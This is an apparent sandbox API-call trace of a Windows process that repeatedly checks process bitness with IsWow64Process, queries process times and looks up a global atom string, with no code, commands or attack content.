	[0134.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.428] CloseHandle (hObject=0x2dc) returned 1
	[0134.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.428] CloseHandle (hObject=0x2dc) returned 1
	[0134.428] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.428] CloseHandle (hObject=0x2dc) returned 1
	[0134.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.429] CloseHandle (hObject=0x2dc) returned 1
	[0134.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.429] CloseHandle (hObject=0x2dc) returned 1
	[0134.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.429] CloseHandle (hObject=0x2dc) returned 1
	[0134.429] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.429] CloseHandle (hObject=0x2dc) returned 1
	[0134.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.430] CloseHandle (hObject=0x2dc) returned 1
	[0134.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.430] CloseHandle (hObject=0x2dc) returned 1
	[0134.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.430] CloseHandle (hObject=0x2dc) returned 1
	[0134.430] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.430] CloseHandle (hObject=0x2dc) returned 1
	[0134.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.431] CloseHandle (hObject=0x2dc) returned 1
	[0134.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.431] CloseHandle (hObject=0x2dc) returned 1
	[0134.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.431] CloseHandle (hObject=0x2dc) returned 1
	[0134.431] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.431] CloseHandle (hObject=0x2dc) returned 1
	[0134.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.432] CloseHandle (hObject=0x2dc) returned 1
	[0134.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.432] CloseHandle (hObject=0x2dc) returned 1
	[0134.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.432] CloseHandle (hObject=0x2dc) returned 1
	[0134.432] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.432] CloseHandle (hObject=0x2dc) returned 1
	[0134.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.433] CloseHandle (hObject=0x2dc) returned 1
	[0134.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.433] CloseHandle (hObject=0x2dc) returned 1
	[0134.433] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.433] CloseHandle (hObject=0x2dc) returned 1
	[0134.434] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.434] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.434] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.434] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.434] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.435] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.435] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.435] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.435] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.435] CloseHandle (hObject=0x2dc) returned 1
	[0134.435] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.435] CloseHandle (hObject=0x2dc) returned 1
	[0134.435] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.436] CloseHandle (hObject=0x2dc) returned 1
	[0134.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.436] CloseHandle (hObject=0x2dc) returned 1
	[0134.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.436] CloseHandle (hObject=0x2dc) returned 1
	[0134.436] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.436] CloseHandle (hObject=0x2dc) returned 1
	[0134.469] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.470] CloseHandle (hObject=0x2dc) returned 1
	[0134.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.470] CloseHandle (hObject=0x2dc) returned 1
	[0134.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.470] CloseHandle (hObject=0x2dc) returned 1
	[0134.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.470] CloseHandle (hObject=0x2dc) returned 1
	[0134.470] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.471] CloseHandle (hObject=0x2dc) returned 1
	[0134.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.471] CloseHandle (hObject=0x2dc) returned 1
	[0134.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.471] CloseHandle (hObject=0x2dc) returned 1
	[0134.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.471] CloseHandle (hObject=0x2dc) returned 1
	[0134.471] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.471] CloseHandle (hObject=0x2dc) returned 1
	[0134.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.472] CloseHandle (hObject=0x2dc) returned 1
	[0134.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.472] CloseHandle (hObject=0x2dc) returned 1
	[0134.472] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.472] CloseHandle (hObject=0x2dc) returned 1
	[0134.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.473] CloseHandle (hObject=0x2dc) returned 1
	[0134.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.473] CloseHandle (hObject=0x2dc) returned 1
	[0134.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.473] CloseHandle (hObject=0x2dc) returned 1
	[0134.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.473] CloseHandle (hObject=0x2dc) returned 1
	[0134.473] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.474] CloseHandle (hObject=0x2dc) returned 1
	[0134.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.474] CloseHandle (hObject=0x2dc) returned 1
	[0134.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.474] CloseHandle (hObject=0x2dc) returned 1
	[0134.474] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.474] CloseHandle (hObject=0x2dc) returned 1
	[0134.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.475] CloseHandle (hObject=0x2dc) returned 1
	[0134.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.475] CloseHandle (hObject=0x2dc) returned 1
	[0134.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.475] CloseHandle (hObject=0x2dc) returned 1
	[0134.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.475] CloseHandle (hObject=0x2dc) returned 1
	[0134.475] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.476] CloseHandle (hObject=0x2dc) returned 1
	[0134.476] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.476] CloseHandle (hObject=0x2dc) returned 1
	[0134.476] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.476] CloseHandle (hObject=0x2dc) returned 1
	[0134.476] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.476] CloseHandle (hObject=0x2dc) returned 1
	[0134.476] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.476] CloseHandle (hObject=0x2dc) returned 1
	[0134.477] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.477] CloseHandle (hObject=0x2dc) returned 1
	[0134.477] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.477] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.477] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.477] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.478] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.478] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.478] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.478] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.478] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.478] CloseHandle (hObject=0x2dc) returned 1
	[0134.478] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.478] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.478] CloseHandle (hObject=0x2dc) returned 1
	[0134.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.479] CloseHandle (hObject=0x2dc) returned 1
	[0134.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.479] CloseHandle (hObject=0x2dc) returned 1
	[0134.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.479] CloseHandle (hObject=0x2dc) returned 1
	[0134.479] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.479] CloseHandle (hObject=0x2dc) returned 1
	[0134.511] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.511] CloseHandle (hObject=0x2dc) returned 1
	[0134.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.512] CloseHandle (hObject=0x2dc) returned 1
	[0134.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.512] CloseHandle (hObject=0x2dc) returned 1
	[0134.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.512] CloseHandle (hObject=0x2dc) returned 1
	[0134.512] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.512] CloseHandle (hObject=0x2dc) returned 1
	[0134.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.513] CloseHandle (hObject=0x2dc) returned 1
	[0134.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.513] CloseHandle (hObject=0x2dc) returned 1
	[0134.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.513] CloseHandle (hObject=0x2dc) returned 1
	[0134.513] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.514] CloseHandle (hObject=0x2dc) returned 1
	[0134.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.514] CloseHandle (hObject=0x2dc) returned 1
	[0134.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.514] CloseHandle (hObject=0x2dc) returned 1
	[0134.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.514] CloseHandle (hObject=0x2dc) returned 1
	[0134.514] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.514] CloseHandle (hObject=0x2dc) returned 1
	[0134.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.515] CloseHandle (hObject=0x2dc) returned 1
	[0134.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.515] CloseHandle (hObject=0x2dc) returned 1
	[0134.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.515] CloseHandle (hObject=0x2dc) returned 1
	[0134.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.515] CloseHandle (hObject=0x2dc) returned 1
	[0134.515] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.515] CloseHandle (hObject=0x2dc) returned 1
	[0134.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.516] CloseHandle (hObject=0x2dc) returned 1
	[0134.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.516] CloseHandle (hObject=0x2dc) returned 1
	[0134.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.516] CloseHandle (hObject=0x2dc) returned 1
	[0134.516] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.516] CloseHandle (hObject=0x2dc) returned 1
	[0134.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.517] CloseHandle (hObject=0x2dc) returned 1
	[0134.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.517] CloseHandle (hObject=0x2dc) returned 1
	[0134.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.517] CloseHandle (hObject=0x2dc) returned 1
	[0134.517] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.517] CloseHandle (hObject=0x2dc) returned 1
	[0134.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.518] CloseHandle (hObject=0x2dc) returned 1
	[0134.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.518] CloseHandle (hObject=0x2dc) returned 1
	[0134.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.518] CloseHandle (hObject=0x2dc) returned 1
	[0134.518] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.518] CloseHandle (hObject=0x2dc) returned 1
	[0134.519] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.519] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.519] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.519] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.519] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.520] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.520] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.520] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.520] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.520] CloseHandle (hObject=0x2dc) returned 1
	[0134.520] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.520] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.520] CloseHandle (hObject=0x2dc) returned 1
	[0134.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.521] CloseHandle (hObject=0x2dc) returned 1
	[0134.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.521] CloseHandle (hObject=0x2dc) returned 1
	[0134.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.521] CloseHandle (hObject=0x2dc) returned 1
	[0134.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.521] CloseHandle (hObject=0x2dc) returned 1
	[0134.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.555] CloseHandle (hObject=0x2dc) returned 1
	[0134.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.555] CloseHandle (hObject=0x2dc) returned 1
	[0134.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.555] CloseHandle (hObject=0x2dc) returned 1
	[0134.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.555] CloseHandle (hObject=0x2dc) returned 1
	[0134.555] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.555] CloseHandle (hObject=0x2dc) returned 1
	[0134.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.556] CloseHandle (hObject=0x2dc) returned 1
	[0134.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.556] CloseHandle (hObject=0x2dc) returned 1
	[0134.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.556] CloseHandle (hObject=0x2dc) returned 1
	[0134.556] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.556] CloseHandle (hObject=0x2dc) returned 1
	[0134.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.557] CloseHandle (hObject=0x2dc) returned 1
	[0134.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.557] CloseHandle (hObject=0x2dc) returned 1
	[0134.557] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.557] CloseHandle (hObject=0x2dc) returned 1
	[0134.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.558] CloseHandle (hObject=0x2dc) returned 1
	[0134.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.558] CloseHandle (hObject=0x2dc) returned 1
	[0134.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.558] CloseHandle (hObject=0x2dc) returned 1
	[0134.558] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.558] CloseHandle (hObject=0x2dc) returned 1
	[0134.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.559] CloseHandle (hObject=0x2dc) returned 1
	[0134.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.559] CloseHandle (hObject=0x2dc) returned 1
	[0134.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.559] CloseHandle (hObject=0x2dc) returned 1
	[0134.559] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.559] CloseHandle (hObject=0x2dc) returned 1
	[0134.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.560] CloseHandle (hObject=0x2dc) returned 1
	[0134.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.560] CloseHandle (hObject=0x2dc) returned 1
	[0134.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.560] CloseHandle (hObject=0x2dc) returned 1
	[0134.560] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.560] CloseHandle (hObject=0x2dc) returned 1
	[0134.561] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.561] CloseHandle (hObject=0x2dc) returned 1
	[0134.561] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.561] CloseHandle (hObject=0x2dc) returned 1
	[0134.561] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.561] CloseHandle (hObject=0x2dc) returned 1
	[0134.561] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.561] CloseHandle (hObject=0x2dc) returned 1
	[0134.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.562] CloseHandle (hObject=0x2dc) returned 1
	[0134.562] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.562] CloseHandle (hObject=0x2dc) returned 1
	[0134.562] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.562] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0134.563] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0134.563] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.563] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0134.563] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0134.563] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0134.564] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0134.564] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0134.564] CloseHandle (hObject=0x2dc) returned 1
	[0134.564] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0134.564] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.564] CloseHandle (hObject=0x2dc) returned 1
	[0134.564] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.564] CloseHandle (hObject=0x2dc) returned 1
	[0134.564] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.565] CloseHandle (hObject=0x2dc) returned 1
	[0134.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.565] CloseHandle (hObject=0x2dc) returned 1
	[0134.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.565] CloseHandle (hObject=0x2dc) returned 1
	[0134.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.600] CloseHandle (hObject=0x2dc) returned 1
	[0134.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.600] CloseHandle (hObject=0x2dc) returned 1
	[0134.600] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0134.600] CloseHandle (hObject=0x2dc) returned 1
